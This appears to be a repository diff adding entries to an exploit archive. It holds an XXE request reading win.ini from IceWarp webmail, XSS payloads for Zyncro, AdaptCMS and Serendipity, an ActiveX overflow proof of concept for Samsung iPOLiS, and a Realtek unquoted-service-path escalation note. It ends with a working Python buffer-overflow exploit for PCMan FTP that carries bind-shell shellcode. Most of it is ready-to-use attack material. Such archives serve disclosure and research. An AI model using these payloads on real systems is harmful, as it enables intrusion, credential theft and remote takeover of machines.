<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
|
||||
type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>
|
||||
|
||||
RESPONSE:
|
||||
==========
|
||||
HTTP/1.1 200 OK
|
||||
Server: IceWarp/9.4.2
|
||||
Date: Wed, 20 Jul
|
||||
2011 10:04:56 GMT
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Type: text/xml
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 1113
|
||||
|
||||
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
|
||||
uid="login_invalid">test; for 16-bit app support
|
||||
[fonts]
|
||||
[extensions]
|
||||
[mci extensions]
|
||||
[files]
|
||||
[Mail]
|
||||
MAPI=1
|
||||
....TRUNCATED
|
42
platforms/php/webapps/36166.txt
Executable file
42
platforms/php/webapps/36166.txt
Executable file
|
@ -0,0 +1,42 @@
|
|||
source: http://www.securityfocus.com/bid/49765/info
|
||||
|
||||
Multiple products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker could exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected websites. This may allow the attacker to steal cookie-based authentication credentials or control how the websites are rendered to the user. Other attacks are also possible.
|
||||
|
||||
The following products are affected:
|
||||
|
||||
WordPress 3.1.4
|
||||
BuddyPress 1.2.10
|
||||
Blogs MU 1.2.6
|
||||
|
||||
One of the functionalities of Zyncro is the possibility of creating
|
||||
groups. The name and description of the groups are not correctly
|
||||
sanitized and it's possible to provoke some attacks.
|
||||
|
||||
In order to do the attack, you must create a new group and capture the
|
||||
packet transferred to the server to modify it because validation is
|
||||
done in client-side (only) using javascript.
|
||||
|
||||
The original request has three POST data parameters like:
|
||||
popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D
|
||||
|
||||
Important data are 'name' and 'description' parameters, which are
|
||||
base64 encoded. In this case, both values are 'test':
|
||||
url_decode(dGVzdA%3D%3D)
|
||||
b64decode(dGVzdA==)
|
||||
test
|
||||
|
||||
It is possible to provoke the XSS by changing those values as follows:
|
||||
"><script>alert("XSS attack")</script>
|
||||
|
||||
Values MUST be in base64, so:
|
||||
b64encode(""><script>alert("XSS attack")</script>") =
|
||||
Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=
|
||||
|
||||
Finally the post-data of the request would become:
|
||||
popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d
|
||||
|
||||
Once the request has reached the server, a new group would be created
|
||||
and any time that someone sees the name/description of the group, a
|
||||
pop-up would appear, this is the easiest attack.
|
16
platforms/php/webapps/36167.txt
Executable file
16
platforms/php/webapps/36167.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/49769/info
|
||||
|
||||
AdaptCMS is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
AdaptCMS 2.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/AdaptCMS/admin.php?view=[XSS]
|
||||
http://www.example.com/AdaptCMS/admin.php?view=share&do=[XSS]
|
||||
http://www.example.com/AdaptCMS//index.php?'[XSS]
|
||||
http://www.example.com/AdaptCMS/admin.php?view=/&view=settings
|
||||
http://www.example.com/AdaptCMS/admin.php?view=/&view=users
|
||||
http://www.example.com/AdaptCMS/admin.php?view=/&view=groups
|
||||
http://www.example.com/AdaptCMS/admin.php?view=/&view=levels
|
||||
http://www.example.com/AdaptCMS/admin.php?view=/&view=stats
|
9
platforms/php/webapps/36168.txt
Executable file
9
platforms/php/webapps/36168.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/49771/info
|
||||
|
||||
Serendipity Freetag-plugin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
This issue affects Serendipity Freetag-plugin 3.22; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=[xss]
|
112
platforms/windows/dos/36152.html
Executable file
112
platforms/windows/dos/36152.html
Executable file
|
@ -0,0 +1,112 @@
|
|||
<!--
|
||||
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
|
||||
# Date: 22/02/2015
|
||||
# Exploit Author: Praveen Darshanam
|
||||
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
|
||||
# Version: Samsung iPOLiS 1.12.2
|
||||
# Tested on: Windows 7 Ultimate N SP1
|
||||
# CVE: 2015-0555
|
||||
-->
|
||||
|
||||
<html>
|
||||
<!--
|
||||
Vulnerability found and PoC coded by Praveen Darshanam
|
||||
http://blog.disects.com
|
||||
CVE-2015-0555
|
||||
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
|
||||
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
|
||||
memberName = "WriteConfigValue"
|
||||
progid = "XNSSDKDEVICELib.XnsSdkDevice"
|
||||
Operating System = Windows 7 Ultimate N SP1
|
||||
Vulnerable Software = Samsung iPOLiS 1.12.2
|
||||
CERT tried to coordinate but there wasn't any response from Samsung
|
||||
-->
|
||||
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
|
||||
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
|
||||
<script>
|
||||
var arg1 = "";
|
||||
var arg2="praveend";
|
||||
|
||||
for (i=0; i<= 15000; i++)
|
||||
{
|
||||
arg1 += "A";
|
||||
}
|
||||
|
||||
target.WriteConfigValue(arg1 ,arg2);
|
||||
|
||||
</script>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
#############Stack Trace####################
|
||||
Exception Code: ACCESS_VIOLATION
|
||||
Disasm: 149434 MOV AL,[ESI+EDX]
|
||||
|
||||
Seh Chain:
|
||||
--------------------------------------------------
|
||||
1 647C7D7D mfc100.dll
|
||||
2 647D0937 mfc100.dll
|
||||
3 64E242CA VBSCRIPT.dll
|
||||
4 77B3E0ED ntdll.dll
|
||||
|
||||
|
||||
Called From Returns To
|
||||
--------------------------------------------------
|
||||
XNSSDKDEVICE.149434 41414141
|
||||
41414141 414141
|
||||
414141 3DA4C4
|
||||
3DA4C4 mfc100.647790C1
|
||||
mfc100.647790C1 56746C75
|
||||
|
||||
|
||||
Registers:
|
||||
--------------------------------------------------
|
||||
EIP 00149434
|
||||
EAX 00003841
|
||||
EBX 00609FB0 -> 0015A564
|
||||
ECX 00003814
|
||||
EDX 00414141
|
||||
EDI 0000008F
|
||||
ESI 0000008F
|
||||
EBP 002BE5FC -> Asc: AAAAAAAAAAA
|
||||
ESP 002BE564 -> 0000000C
|
||||
|
||||
|
||||
Block Disassembly:
|
||||
--------------------------------------------------
|
||||
149423 XOR EDI,EDI
|
||||
149425 XOR ESI,ESI
|
||||
149427 MOV [EBP-8C],ECX
|
||||
14942D TEST ECX,ECX
|
||||
14942F JLE SHORT 00149496
|
||||
149431 MOV EDX,[EBP+8]
|
||||
149434 MOV AL,[ESI+EDX] <--- CRASH
|
||||
149437 CMP AL,2F
|
||||
149439 JNZ SHORT 00149489
|
||||
14943B MOV ECX,EBX
|
||||
14943D TEST ESI,ESI
|
||||
14943F JNZ SHORT 0014944D
|
||||
149441 PUSH 159F28
|
||||
149446 CALL 0014F7C0
|
||||
14944B JMP SHORT 00149476
|
||||
|
||||
|
||||
ArgDump:
|
||||
--------------------------------------------------
|
||||
EBP+8 00414141
|
||||
EBP+12 003DA4C4 -> Asc: defaultV
|
||||
EBP+16 647790C1 -> EBE84589
|
||||
EBP+20 FFFFFFFE
|
||||
EBP+24 646CBE5C -> CCCCCCC3
|
||||
EBP+28 0000001C
|
||||
|
||||
|
||||
Stack Dump:
|
||||
--------------------------------------------------
|
||||
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
|
||||
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
||||
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
||||
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
||||
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
||||
|
||||
-->
|
51
platforms/windows/local/36062.txt
Executable file
51
platforms/windows/local/36062.txt
Executable file
|
@ -0,0 +1,51 @@
|
|||
Realtek 11n Wireless LAN utility privilege escalation.
|
||||
|
||||
Vulnerability Discovered by Humberto Cabrera @dniz0r
|
||||
http://zeroscience.mk @zeroscience
|
||||
|
||||
Summary:
|
||||
? Realtek 11n Wireless LAN utility is deployed and used by realtek
|
||||
alfa cards and more in order to help diagnose and view wireless card
|
||||
properties.
|
||||
|
||||
Description:
|
||||
- Unquoted Privilege escalation that allows a user to gain SYSTEM
|
||||
privileges.
|
||||
|
||||
Date - 12 Feb 2015
|
||||
Version: 700.1631.106.2011
|
||||
Vendor: www.realtek.com.tw
|
||||
Advisory URL:
|
||||
https://eaty0face.wordpress.com/2015/02/13/realtek-11n-wireless-lan-utility-privilege-escalation/
|
||||
Tested on: Win7
|
||||
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: realtek11ncu
|
||||
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\REALTEK\11n USB Wireless LAN
|
||||
Utility\RtlService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Realtek11nCU
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
C:\Windows\system32>sc qc realtek11nsu
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: realtek11nsu
|
||||
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\REALTEK\Wireless LAN
|
||||
Utility\RtlService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Realtek11nSU
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
58
platforms/windows/remote/36078.py
Executable file
58
platforms/windows/remote/36078.py
Executable file
|
@ -0,0 +1,58 @@
|
|||
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
|
||||
# Date : 12/02/2015
|
||||
# Author: R-73eN
|
||||
# Software: PCMan FTP Server v2.0.7
|
||||
# Tested On Windows Xp SP3
|
||||
|
||||
import socket
|
||||
|
||||
#348 Bytes Bind Shell Port TCP/4444
|
||||
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
|
||||
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
|
||||
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
|
||||
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
|
||||
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
|
||||
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
|
||||
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
|
||||
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
|
||||
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
|
||||
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
|
||||
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
|
||||
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
|
||||
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
|
||||
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
|
||||
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
|
||||
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
|
||||
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
|
||||
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
|
||||
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
|
||||
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
|
||||
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
|
||||
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
|
||||
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
|
||||
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
|
||||
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
server = raw_input('Enter IP : ')
|
||||
s.connect((server, 21))
|
||||
a = s.recv(1024)
|
||||
print ' [+] ' + a
|
||||
s.send('User anonymous')
|
||||
s.recv(1024)
|
||||
s.send('pass')
|
||||
s.recv(1024)
|
||||
print ' [+] Logged in as Anonymous ...'
|
||||
evil = 'A' * 2007 #JUNK
|
||||
evil += '\x65\x82\xA5\x7C' # EIP overwrite jmp esp / shell32.dll
|
||||
evil += '\x90' * 10
|
||||
evil += shellcode
|
||||
print ' [+] Sending Payload ...'
|
||||
s.send('mkd ' + evil)
|
||||
print ' [+] You got shell .....\n telnet ' + server + ' 4444'
|
Loading…
Add table
Reference in a new issue